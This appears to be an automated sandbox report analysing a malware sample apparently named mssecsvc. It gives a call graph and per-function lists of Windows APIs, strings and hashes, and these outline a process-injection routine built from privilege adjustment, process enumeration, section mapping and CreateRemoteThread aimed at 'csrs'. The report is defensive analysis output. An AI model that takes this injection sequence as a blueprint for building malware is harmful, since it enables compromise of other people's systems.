2802->2765 2805 a810db 2803->2805 2804 a8115c 2804->2769 2805->2803 2805->2804 2806 a81133 GetModuleHandleA GetProcAddress 2805->2806 2806->2805 2853 a83ecc GetProcAddress GetModuleFileNameA 2807->2853 2836 a83f7e 2835->2836 2837 a810ce 2 API calls 2835->2837 2838 a83f8f 28 API calls 2836->2838 2837->2836 2839 a83f83 2838->2839 2840 a83ffa CreateEventA 2839->2840 2841 a83fd3 CreateThread CloseHandle 2839->2841 2848 a84012 2840->2848 2841->2840 2842 a84056 lstrlen 2842->2842 2842->2848 2843 a84320 RtlExitUserThread 2844 a842d0 SetEvent 2844->2848 2845 a842f2 Sleep ResetEvent 2845->2848 2846 a840ef GetVersionExA 2846->2848 2847 a84178 11 API calls 2847->2848 2848->2842 2848->2843 2848->2844 2848->2845 2848->2846 2848->2847 2849 a841a7 CreateThread CloseHandle 2848->2849 2850 a841f6 GetTickCount 2848->2850 2851 a84288 Sleep 2848->2851 2849->2848 2850->2848 2851->2848 2852 a84294 GetTickCount 2851->2852 2852->2848 2854 a83efd 2853->2854 2855 a83f25 2854->2855 2878 a83405 2854->2878 2857 a83f4f 2855->2857 2858 a83f31 CreateThread CloseHandle 2855->2858 2859 a83f60 43 API calls 2857->2859 2858->2857 2860 a83f54 2859->2860 2861 a810ce 2 API calls 2860->2861 2862 a83f7e 2861->2862 2887 a83f8f LoadLibraryA 2862->2887 2879 a8343b 2878->2879 2879->2879 2880 a83440 NtOpenSection 2879->2880 2881 a8344e 2880->2881 2882 a8345f NtQuerySystemInformation 2881->2882 2886 a835f3 2881->2886 2883 a8346f MapViewOfFile CloseHandle 2882->2883 2885 a834b0 2883->2885 2883->2886 2884 a834b7 UnmapViewOfFile 2884->2886 2885->2884 2885->2886 2886->2855 2888 a83f9d 2887->2888 2889 a84320 RtlExitUserThread 2887->2889 2890 a810ce 2 API calls 2888->2890 2891 a83fb5 2890->2891 2891->2889 2892 a83fd4 CreateThread CloseHandle 2891->2892 2893 a83ffa CreateEventA 2892->2893 2899 a84012 2893->2899 2894 a84056 lstrlen 2894->2894 2894->2899 2895 a842d0 SetEvent 2895->2899 2896 a842f2 Sleep ResetEvent 2896->2899 2897 a840ef GetVersionExA 2897->2899 2899->2889 2899->2894 2899->2895 2899->2896 2899->2897 2900 a841a7 CreateThread CloseHandle 2899->2900 2901 a841f6 GetTickCount 2899->2901 2902 a84288 Sleep 2899->2902 2904 a84178 2899->2904 2900->2899 2901->2899 2902->2899 2903 a84294 GetTickCount 2902->2903 2903->2899 2914 a84012 2904->2914 2905 a841a7 CreateThread CloseHandle 2905->2914 2906 a841f6 GetTickCount 2906->2914 2907 a84320 RtlExitUserThread 2908 a842d0 SetEvent 2908->2914 2909 a842f2 Sleep ResetEvent 2909->2914 2910 a84056 lstrlen 2910->2910 2910->2914 2911 a84288 Sleep 2912 a84294 GetTickCount 2911->2912 2911->2914 2912->2914 2913 a840ef GetVersionExA 2913->2914 2914->2905 2914->2906 2914->2907 2914->2908 2914->2909 2914->2910 2914->2911 2914->2913 2916 a83d7d 2915->2916 2917 a810ce 2 API calls 2915->2917 2918 a83d92 GetTickCount 2916->2918 2917->2916 2919 a83daa 2918->2919 2920 a83e47 GetVolumeInformationA 2919->2920 2921 a83e7a 2920->2921 2922 a83f25 2921->2922 2923 a83eb5 84 API calls 2921->2923 2925 a83f4f 2922->2925 2926 a83f31 CreateThread CloseHandle 2922->2926 2924 a83ea9 2923->2924 2924->2922 2928 a83efd 2924->2928 2930 a83eca GetModuleFileNameA 2924->2930 2927 a83f60 43 API calls 2925->2927 2926->2925 2929 a83f54 2927->2929 2928->2922 2932 a83405 5 API calls 2928->2932 2931 a810ce 2 API calls 2929->2931 2930->2928 2933 a83f7e 2931->2933 2932->2922 2934 a83f8f 28 API calls 2933->2934 2935 a83f83 2934->2935 2936 a83ffa CreateEventA 2935->2936 2937 a83fd3 CreateThread CloseHandle 2935->2937 2944 a84012 2936->2944 2937->2936 2938 a84056 lstrlen 2938->2938 2938->2944 2939 a84320 RtlExitUserThread 2940 a842d0 SetEvent 2940->2944 2941 a842f2 Sleep ResetEvent 2941->2944 2942 a840ef GetVersionExA 2942->2944 2943 a84178 11 API calls 2943->2944 2944->2938 2944->2939 2944->2940 2944->2941 2944->2942 2944->2943 2945 a841a7 CreateThread CloseHandle 2944->2945 2946 a841f6 GetTickCount 2944->2946 2947 a84288 Sleep 2944->2947 2945->2944 2946->2944 2947->2944 2948 a84294 GetTickCount 2947->2948 2948->2944 2554 a83399 2556 a833a2 2554->2556 2557 a833a9 Sleep 2556->2557 2557->2557 2558 a83819 2560 a8381f WaitForSingleObject 2558->2560 2561 a8383b 2560->2561 2533 a8443b 2536 a8144a LookupPrivilegeValueA NtAdjustPrivilegesToken 2533->2536 2535 a84441 2536->2535 2481 409a16 __set_app_type __p__fmode __p__commode 2482 409a85 2481->2482 2483 409a99 2482->2483 2484 409a8d __setusermatherr 2482->2484 2488 409b8c _controlfp 2483->2488 2484->2483 2486 409a9e _initterm __getmainargs _initterm 2487 409af2 2486->2487 2488->2486 2949 a802fe 2950 a80415 2949->2950 2952 a8042d 2950->2952 2953 a810ce 2 API calls 2952->2953 2954 a8048f 2953->2954 2955 a804dd 2954->2955 2956 a804b0 GetModuleHandleA 2954->2956 2957 a804f8 GetVersion 2955->2957 2956->2955 2958 a805ca 2957->2958 2959 a8050f VirtualAlloc 2957->2959 2960 a805a9 CloseHandle 2958->2960 2961 a805d3 SetProcessAffinityMask 2958->2961 2959->2960 2965 a80532 2959->2965 2963 a805f2 GetModuleHandleA 2960->2963 2986 a805f2 GetModuleHandleA 2961->2986 2964 a810ce 2 API calls 2963->2964 2981 a805ec 2964->2981 2965->2960 2983 a805ba 2965->2983 2966 a806fc lstrcpyW 3005 a824ae lstrcpyW lstrlenW 2966->3005 2968 a8074c NtMapViewOfSection 2968->2960 2968->2981 2969 a80717 GetPEB lstrcpyW lstrcatW 2971 a824ae 3 API calls 2969->2971 2971->2981 2972 a80780 NtOpenProcessToken 2973 a807c5 CreateToolhelp32Snapshot Process32First 2972->2973 2972->2981 2974 a807eb Process32Next 2973->2974 2975 a80865 CloseHandle 2974->2975 2974->2981 2975->2960 2976 a807fd OpenProcess 2976->2974 2976->2981 2978 a82574 5 API calls 2978->2981 2979 a8085c CloseHandle 2979->2974 2980 a80834 CreateRemoteThread 2980->2979 2980->2981 2981->2960 2981->2966 2981->2968 2981->2969 2981->2972 2981->2973 2981->2974 2981->2976 2981->2978 2981->2979 2981->2980 2982 a805ba Sleep 2981->2982 3008 a807ac 2981->3008 2982->2979 2984 a805c9 2983->2984 2985 a805bf Sleep 2983->2985 2984->2960 2985->2983 2987 a810ce 2 API calls 2986->2987 2988 a8060e 2987->2988 2989 a805a9 CloseHandle 2988->2989 2990 a806fc lstrcpyW 2988->2990 2992 a8074c NtMapViewOfSection 2988->2992 2993 a80717 GetPEB lstrcpyW lstrcatW 2988->2993 2995 a80780 NtOpenProcessToken 2988->2995 2996 a807c5 CreateToolhelp32Snapshot Process32First 2988->2996 2997 a807eb Process32Next 2988->2997 2999 a807fd OpenProcess 2988->2999 3000 a807ac 30 API calls 2988->3000 3001 a82574 5 API calls 2988->3001 3002 a8085c CloseHandle 2988->3002 3003 a80834 CreateRemoteThread 2988->3003 3004 a805ba Sleep 2988->3004 2989->2986 2991 a824ae 3 API calls 2990->2991 2991->2988 2992->2988 2992->2989 2994 a824ae 3 API calls 2993->2994 2994->2988 2995->2988 2995->2996 2996->2997 2997->2988 2998 a80865 CloseHandle 2997->2998 2998->2989 2999->2988 2999->2997 3000->2988 3001->2988 3002->2997 3003->2988 3003->3002 3004->3002 3006 a86ce7 3005->3006 3007 a824ea NtCreateSection 3006->3007 3007->2981 3031 a8144a LookupPrivilegeValueA NtAdjustPrivilegesToken 3008->3031 3010 a807b2 FreeLibrary FindCloseChangeNotification 3011 a807c5 CreateToolhelp32Snapshot Process32First 3010->3011 3012 a807eb Process32Next 3011->3012 3013 a80865 CloseHandle 3012->3013 3029 a8060e 3012->3029 3014 a805a9 CloseHandle 3013->3014 3016 a805f2 GetModuleHandleA 3014->3016 3015 a807fd OpenProcess 3015->3012 3015->3029 3017 a810ce 2 API calls 3016->3017 3017->3029 3018 a82574 5 API calls 3018->3029 3019 a8085c CloseHandle 3019->3012 3020 a80834 CreateRemoteThread 3020->3019 3021 a8084d 3020->3021 3022 a805ba Sleep 3021->3022 3022->3019 3023 a806fc lstrcpyW 3024 a824ae 3 API calls 3023->3024 3024->3029 3025 a8074c NtMapViewOfSection 3025->3014 3025->3029 3026 a80717 GetPEB lstrcpyW lstrcatW 3027 a824ae 3 API calls 3026->3027 3027->3029 3028 a80780 NtOpenProcessToken 3028->3011 3028->3029 3029->3011 3029->3012 3029->3014 3029->3015 3029->3018 3029->3019 3029->3020 3029->3023 3029->3025 3029->3026 3029->3028 3030 a807ac 13 API calls 3029->3030 3030->3029 3031->3010

                                                                                Executed Functions

                                                                                Function 00A8042D Relevance: 33.5, APIs: 16, Strings: 3, Instructions: 290memoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 0 a8042d-a804a4 call a810ce 3 a804dd 0->3 4 a804a6-a804db call a8273c GetModuleHandleA 0->4 6 a804e4-a80509 call a82750 GetVersion 3->6 4->6 10 a805ca-a805d1 6->10 11 a8050f-a80530 VirtualAlloc 6->11 12 a805a9-a80615 CloseHandle GetModuleHandleA call a810ce 10->12 13 a805d3-a805fc SetProcessAffinityMask call a805f2 10->13 11->12 14 a80532-a80562 call a80305 11->14 27 a80617-a80630 12->27 21 a805fe-a8061c 13->21 22 a80621-a80630 13->22 14->12 26 a80564-a8057b 14->26 21->22 28 a80639-a80652 22->28 29 a80632 22->29 26->12 33 a8057d-a805a4 26->33 27->28 27->29 28->12 30 a80658-a80671 28->30 29->28 30->12 32 a80677-a80690 30->32 32->12 34 a80696-a8069c 32->34 33->12 48 a805a4 call a805ba 33->48 35 a806d8-a806de 34->35 36 a8069e-a806b1 34->36 39 a806fc-a80715 lstrcpyW call a824ae 35->39 40 a806e0-a806f3 35->40 36->12 38 a806b7-a806bd 36->38 38->35 43 a806bf-a806d2 38->43 46 a8074c-a80775 NtMapViewOfSection 39->46 47 a80717-a80746 GetPEB lstrcpyW lstrcatW call a824ae 39->47 40->39 41 a806f5 40->41 41->39 43->12 43->35 46->12 50 a8077b-a8078f call a80305 NtOpenProcessToken 46->50 47->12 47->46 48->12 54 a80791-a807a3 call a8115d call a807ac 50->54 55 a807c5-a807e4 CreateToolhelp32Snapshot Process32First 50->55 65 a8080e-a8080f 54->65 66 a807a5 54->66 56 a807eb-a807f5 Process32Next 55->56 58 a80865-a80872 CloseHandle 56->58 59 a807f7-a807fb 56->59 58->12 59->56 61 a807fd-a8080d OpenProcess 59->61 61->56 63 a8080f 61->63 67 a80810-a80818 call a82574 63->67 65->67 66->67 68 a807a7-a807c4 66->68 72 a8081a-a80820 67->72 73 a8085c-a80863 CloseHandle 67->73 68->55 72->73 74 a80822-a80832 72->74 73->56 74->73 75 a80834-a8084b CreateRemoteThread 74->75 75->73 76 a8084d-a80857 call a805ba 75->76 76->73
                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(00000000), ref: 00A804BE
                                                                                • GetVersion.KERNEL32 ref: 00A80500
                                                                                • VirtualAlloc.KERNEL32(00000000,000077C4,08001000,00000040), ref: 00A80528
                                                                                • CloseHandle.KERNEL32(?), ref: 00A805AD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.388703492.0000000000A80000.00000040.10000000.00040000.00000000.sdmp, Offset: 00A80000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_a80000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Handle$AllocCloseModuleVersionVirtual
                                                                                • String ID: \BaseNamedObjects\npbtVt$\BaseNamedObjects\npbtVt$csrs
                                                                                • API String ID: 3017432202-4282356854
                                                                                • Opcode ID: 81b0063a9adf2c12a5dd8ff3f23d6d1627d705fe34f51cbb45105d7fa12ae896
                                                                                • Instruction ID: 4eb1f2d3fd7875ab3c0331ba287f790178648f1a0f5ef42fb40255786449e7a7
                                                                                • Opcode Fuzzy Hash: 81b0063a9adf2c12a5dd8ff3f23d6d1627d705fe34f51cbb45105d7fa12ae896
                                                                                • Instruction Fuzzy Hash: A1B1BA71605249FFEB65AF24C80AFAA3BADEF44310F004128F9099E081C7F09F59CB69
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00A805F2 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 193stringnativeprocessCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 78 a805f2-a80615 GetModuleHandleA call a810ce 81 a805a9-a805b3 CloseHandle 78->81 82 a80617-a80630 78->82 81->78 83 a80639-a80652 82->83 84 a80632 82->84 83->81 85 a80658-a80671 83->85 84->83 85->81 86 a80677-a80690 85->86 86->81 87 a80696-a8069c 86->87 88 a806d8-a806de 87->88 89 a8069e-a806b1 87->89 91 a806fc-a80715 lstrcpyW call a824ae 88->91 92 a806e0-a806f3 88->92 89->81 90 a806b7-a806bd 89->90 90->88 95 a806bf-a806d2 90->95 97 a8074c-a80775 NtMapViewOfSection 91->97 98 a80717-a80746 GetPEB lstrcpyW lstrcatW call a824ae 91->98 92->91 93 a806f5 92->93 93->91 95->81 95->88 97->81 100 a8077b-a8078f call a80305 NtOpenProcessToken 97->100 98->81 98->97 104 a80791-a807a3 call a8115d call a807ac 100->104 105 a807c5-a807e4 CreateToolhelp32Snapshot Process32First 100->105 115 a8080e-a8080f 104->115 116 a807a5 104->116 106 a807eb-a807f5 Process32Next 105->106 108 a80865-a80872 CloseHandle 106->108 109 a807f7-a807fb 106->109 108->81 109->106 111 a807fd-a8080d OpenProcess 109->111 111->106 113 a8080f 111->113 117 a80810-a80818 call a82574 113->117 115->117 116->117 118 a807a7-a807c4 116->118 122 a8081a-a80820 117->122 123 a8085c-a80863 CloseHandle 117->123 118->105 122->123 124 a80822-a80832 122->124 123->106 124->123 125 a80834-a8084b CreateRemoteThread 124->125 125->123 126 a8084d-a80857 call a805ba 125->126 126->123
                                                                                APIs
                                                                                • CloseHandle.KERNEL32(?), ref: 00A805AD
                                                                                • GetModuleHandleA.KERNEL32(00A805EC), ref: 00A805F2
                                                                                • lstrcpyW.KERNEL32(\BaseNamedObjects\npbtVt,\BaseNamedObjects\npbtVt), ref: 00A8070A
                                                                                • lstrcpyW.KERNEL32(\BaseNamedObjects\npbtVt,?), ref: 00A8072D
                                                                                • lstrcatW.KERNEL32(\BaseNamedObjects\npbtVt,\npbtVt), ref: 00A8073B
                                                                                • NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,000077C4,00000000,?,00000002,00000000,00000040), ref: 00A8076B
                                                                                • NtOpenProcessToken.NTDLL(000000FF,00000020), ref: 00A80786
                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00A807C9
                                                                                • Process32First.KERNEL32 ref: 00A807DC
                                                                                • Process32Next.KERNEL32 ref: 00A807ED
                                                                                • OpenProcess.KERNEL32(0000002A,00000000,?,?,?,?,?,?,00000002,00000000,00000040,00000000,000077C4), ref: 00A80805
                                                                                • CreateRemoteThread.KERNELBASE(?,00000000,00000000,-00003C38,00000002,00000000), ref: 00A80842
                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,00000002,00000000,00000040,00000000,000077C4), ref: 00A8085D
                                                                                • CloseHandle.KERNEL32 ref: 00A8086C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.388703492.0000000000A80000.00000040.10000000.00040000.00000000.sdmp, Offset: 00A80000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_a80000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Handle$Close$CreateOpenProcessProcess32lstrcpy$FirstModuleNextRemoteSectionSnapshotThreadTokenToolhelp32Viewlstrcat
                                                                                • String ID: \BaseNamedObjects\npbtVt$\BaseNamedObjects\npbtVt$csrs
                                                                                • API String ID: 1545766225-4282356854
                                                                                • Opcode ID: 84343efd2f347f88d62e26acca5ca8bb34f80725e1b7dabf79c0c1ff2d0fa36d
                                                                                • Instruction ID: 5282e08341f8ced445e45ba663cf85bf1af6a4bd17b347a1d2bab1f1512455a2
                                                                                • Opcode Fuzzy Hash: 84343efd2f347f88d62e26acca5ca8bb34f80725e1b7dabf79c0c1ff2d0fa36d
                                                                                • Instruction Fuzzy Hash: EF718A31605209FFEB65AF10CC4AFAE3B6DEF45311F104028E9099E091C7B59F499BA9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00A8252F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29nativeCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 198 a8252f-a82573 NtOpenSection
                                                                                APIs
                                                                                • NtOpenSection.NTDLL(?,0000000E), ref: 00A8255E
                                                                                Strings
                                                                                • \BaseNamedObjects\npbtVt, xrefs: 00A8254B
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.388703492.0000000000A80000.00000040.10000000.00040000.00000000.sdmp, Offset: 00A80000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_a80000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: OpenSection
                                                                                • String ID: \BaseNamedObjects\npbtVt
                                                                                • API String ID: 1950954290-3914055295
                                                                                • Opcode ID: 070b698a65d812778bebda462e03455ac2d4d74c25fc029a23958a9dd811b266
                                                                                • Instruction ID: cc492c20b74137972e1aeb42a549193fdcd5baff80c1f90c3202c4eb3a6ea2fd
                                                                                • Opcode Fuzzy Hash: 070b698a65d812778bebda462e03455ac2d4d74c25fc029a23958a9dd811b266
                                                                                • Instruction Fuzzy Hash: A1E0DFF1342105BAFB288B19CC07FB7220DCBC0600F048604F918DA090E6F4AF104278
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00A82574 Relevance: 3.1, APIs: 2, Instructions: 66nativeCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 199 a82574-a8257c call a8252f 202 a82661-a82664 199->202 203 a82582-a825b4 NtMapViewOfSection FindCloseChangeNotification 199->203 203->202 204 a825ba-a825c0 203->204 205 a825ce-a825d8 204->205 206 a825c2-a825cb 204->206 207 a825da-a825e2 205->207 208 a825ef-a8262a call a82477 * 3 205->208 206->205 207->208 210 a825e4-a825ea call a82477 207->210 217 a8262c-a82632 call a82477 208->217 218 a82637-a8263f 208->218 210->208 217->218 220 a8264c-a82654 218->220 221 a82641-a82647 call a82477 218->221 220->202 223 a82656-a8265c call a82477 220->223 221->220 223->202
                                                                                APIs
                                                                                  • Part of subcall function 00A8252F: NtOpenSection.NTDLL(?,0000000E), ref: 00A8255E
                                                                                • NtMapViewOfSection.NTDLL(00000000,?,?,00000000,0000B7C4,00000000,?,00000002,00100000,00000040), ref: 00A825A4
                                                                                • FindCloseChangeNotification.KERNELBASE(00000000,0000B7C4,00000000,?,00000002,00100000,00000040,00000000,0000B7C4,00000000,?,00A80815), ref: 00A825AC
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.388703492.0000000000A80000.00000040.10000000.00040000.00000000.sdmp, Offset: 00A80000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_a80000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Section$ChangeCloseFindNotificationOpenView
                                                                                • String ID:
                                                                                • API String ID: 1694706092-0
                                                                                • Opcode ID: 7e6d81ae67240a40e11905e7904a542b9946b97cc322a4af05470e0a41c17acf
                                                                                • Instruction ID: 0060fcdfbef91a0cc7bcfb9512bfa99a5eb6d19f4902e906be010f77603aea86
                                                                                • Opcode Fuzzy Hash: 7e6d81ae67240a40e11905e7904a542b9946b97cc322a4af05470e0a41c17acf
                                                                                • Instruction Fuzzy Hash: B121E97030054ABBEB28EF65CC56FB97369EF80744F501128F8598E1D5EBB1AE14C768
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00A81422 Relevance: 3.0, APIs: 2, Instructions: 38nativeCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 225 a81422-a81474 LookupPrivilegeValueA NtAdjustPrivilegesToken
                                                                                APIs
                                                                                • LookupPrivilegeValueA.ADVAPI32(00000000,?), ref: 00A8145A
                                                                                • NtAdjustPrivilegesToken.NTDLL(?,00000000,?,00000000,00000000,00000000), ref: 00A8146A
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.388703492.0000000000A80000.00000040.10000000.00040000.00000000.sdmp, Offset: 00A80000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_a80000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AdjustLookupPrivilegePrivilegesTokenValue
                                                                                • String ID:
                                                                                • API String ID: 3615134276-0
                                                                                • Opcode ID: 4d961b29825b6918877cf0b8ca3bbdf1a1a783037955428b050f6265267c3a26
                                                                                • Instruction ID: ddbff97e699881e74d61e2820170bd54818263a6fff0c1519b9bac5ac29647fb
                                                                                • Opcode Fuzzy Hash: 4d961b29825b6918877cf0b8ca3bbdf1a1a783037955428b050f6265267c3a26
                                                                                • Instruction Fuzzy Hash: 5BF0AE36542510BBD7205F56CD8EED77F28EF533A0F144556F4484E151C2624BA5D3F4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00A82477 Relevance: 3.0, APIs: 2, Instructions: 25nativeCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 226 a82477-a824ad NtProtectVirtualMemory NtWriteVirtualMemory
                                                                                APIs
                                                                                • NtProtectVirtualMemory.NTDLL(?,?,?,00000040), ref: 00A8249B
                                                                                • NtWriteVirtualMemory.NTDLL ref: 00A824A4
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.388703492.0000000000A80000.00000040.10000000.00040000.00000000.sdmp, Offset: 00A80000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_a80000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: MemoryVirtual$ProtectWrite
                                                                                • String ID:
                                                                                • API String ID: 151266762-0
                                                                                • Opcode ID: 3b89ad314080acfcfa5e752e4380cd5b7e8fc3aa7940f56e0bfe36a9f1ccff9c
                                                                                • Instruction ID: 6bbb67ea70d6ee96dfa5f1d7b4d314b28acc786a60d934acbd3f762ecc45b662
                                                                                • Opcode Fuzzy Hash: 3b89ad314080acfcfa5e752e4380cd5b7e8fc3aa7940f56e0bfe36a9f1ccff9c
                                                                                • Instruction Fuzzy Hash: 2AE012E07502007FF5185F55DC5FF7B391DDB41751F410208FA0A981C4F9A15E18467A
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00A8144A Relevance: 3.0, APIs: 2, Instructions: 22nativeCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 227 a8144a-a81474 LookupPrivilegeValueA NtAdjustPrivilegesToken
                                                                                APIs
                                                                                • LookupPrivilegeValueA.ADVAPI32(00000000,?), ref: 00A8145A
                                                                                • NtAdjustPrivilegesToken.NTDLL(?,00000000,?,00000000,00000000,00000000), ref: 00A8146A
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.388703492.0000000000A80000.00000040.10000000.00040000.00000000.sdmp, Offset: 00A80000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_a80000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AdjustLookupPrivilegePrivilegesTokenValue
                                                                                • String ID:
                                                                                • API String ID: 3615134276-0
                                                                                • Opcode ID: f45ad7484d04f34a0af0f423c52b42987f710650b5115a9fa6d287fad7b05342
                                                                                • Instruction ID: ee32c209e3d0a2de55b6acbdbca8a3d00d8b73f2470e3acbbab87dcaf3c2c19a
                                                                                • Opcode Fuzzy Hash: f45ad7484d04f34a0af0f423c52b42987f710650b5115a9fa6d287fad7b05342
                                                                                • Instruction Fuzzy Hash: F2D06731643034BBD6312A568C0EEE77D1DEF577A0F015041F9089A1A1C5A28EA1C7F5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00A807AC Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 62processthreadinjectionCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 128 a807ac-a807bf call a8144a FreeLibrary FindCloseChangeNotification 131 a807c5-a807e4 CreateToolhelp32Snapshot Process32First 128->131 132 a807eb-a807f5 Process32Next 131->132 133 a80865-a80872 CloseHandle 132->133 134 a807f7-a807fb 132->134 135 a805a9-a80615 CloseHandle GetModuleHandleA call a810ce 133->135 134->132 136 a807fd-a8080d OpenProcess 134->136 144 a80617-a80630 135->144 136->132 137 a8080f 136->137 139 a80810-a80818 call a82574 137->139 145 a8081a-a80820 139->145 146 a8085c-a80863 CloseHandle 139->146 148 a80639-a80652 144->148 149 a80632 144->149 145->146 147 a80822-a80832 145->147 146->132 147->146 150 a80834-a8084b CreateRemoteThread 147->150 148->135 151 a80658-a80671 148->151 149->148 150->146 152 a8084d-a80857 call a805ba 150->152 151->135 153 a80677-a80690 151->153 152->146 153->135 155 a80696-a8069c 153->155 156 a806d8-a806de 155->156 157 a8069e-a806b1 155->157 159 a806fc-a80715 lstrcpyW call a824ae 156->159 160 a806e0-a806f3 156->160 157->135 158 a806b7-a806bd 157->158 158->156 163 a806bf-a806d2 158->163 165 a8074c-a80775 NtMapViewOfSection 159->165 166 a80717-a80746 GetPEB lstrcpyW lstrcatW call a824ae 159->166 160->159 161 a806f5 160->161 161->159 163->135 163->156 165->135 168 a8077b-a8078f call a80305 NtOpenProcessToken 165->168 166->135 166->165 168->131 172 a80791-a807a3 call a8115d call a807ac 168->172 177 a8080e-a8080f 172->177 178 a807a5 172->178 177->139 178->139 179 a807a7-a807c4 178->179 179->131
                                                                                APIs
                                                                                  • Part of subcall function 00A8144A: LookupPrivilegeValueA.ADVAPI32(00000000,?), ref: 00A8145A
                                                                                  • Part of subcall function 00A8144A: NtAdjustPrivilegesToken.NTDLL(?,00000000,?,00000000,00000000,00000000), ref: 00A8146A
                                                                                • CloseHandle.KERNEL32(?), ref: 00A805AD
                                                                                • FreeLibrary.KERNEL32(73E60000,?,00A8079B,00000000,000077C4,00000000,?,00000002,00000000,00000040,00000000,000077C4), ref: 00A807B8
                                                                                • FindCloseChangeNotification.KERNELBASE(?,?,00A8079B,00000000,000077C4,00000000,?,00000002,00000000,00000040,00000000,000077C4), ref: 00A807BF
                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00A807C9
                                                                                • Process32First.KERNEL32 ref: 00A807DC
                                                                                • Process32Next.KERNEL32 ref: 00A807ED
                                                                                • OpenProcess.KERNEL32(0000002A,00000000,?,?,?,?,?,?,00000002,00000000,00000040,00000000,000077C4), ref: 00A80805
                                                                                • CreateRemoteThread.KERNELBASE(?,00000000,00000000,-00003C38,00000002,00000000), ref: 00A80842
                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,00000002,00000000,00000040,00000000,000077C4), ref: 00A8085D
                                                                                • CloseHandle.KERNEL32 ref: 00A8086C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.388703492.0000000000A80000.00000040.10000000.00040000.00000000.sdmp, Offset: 00A80000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_a80000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Close$Handle$CreateProcess32$AdjustChangeFindFirstFreeLibraryLookupNextNotificationOpenPrivilegePrivilegesProcessRemoteSnapshotThreadTokenToolhelp32Value
                                                                                • String ID: csrs
                                                                                • API String ID: 2727238916-2321902090
                                                                                • Opcode ID: 214ed8d877d5af5bdcbfeb92dfaf8d9be1786541dc830f75d8708442990ea625
                                                                                • Instruction ID: 832f1897af47fc7174f13e4db59b71070573a49a6f03b8d232631357d92e75a7
                                                                                • Opcode Fuzzy Hash: 214ed8d877d5af5bdcbfeb92dfaf8d9be1786541dc830f75d8708442990ea625
                                                                                • Instruction Fuzzy Hash: 86112B30601205BBEB657F21CD4AFBF3A6DEF44701F00002CF94A9A081CAB49B459BAA
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00409A16 Relevance: 10.6, APIs: 7, Instructions: 102COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
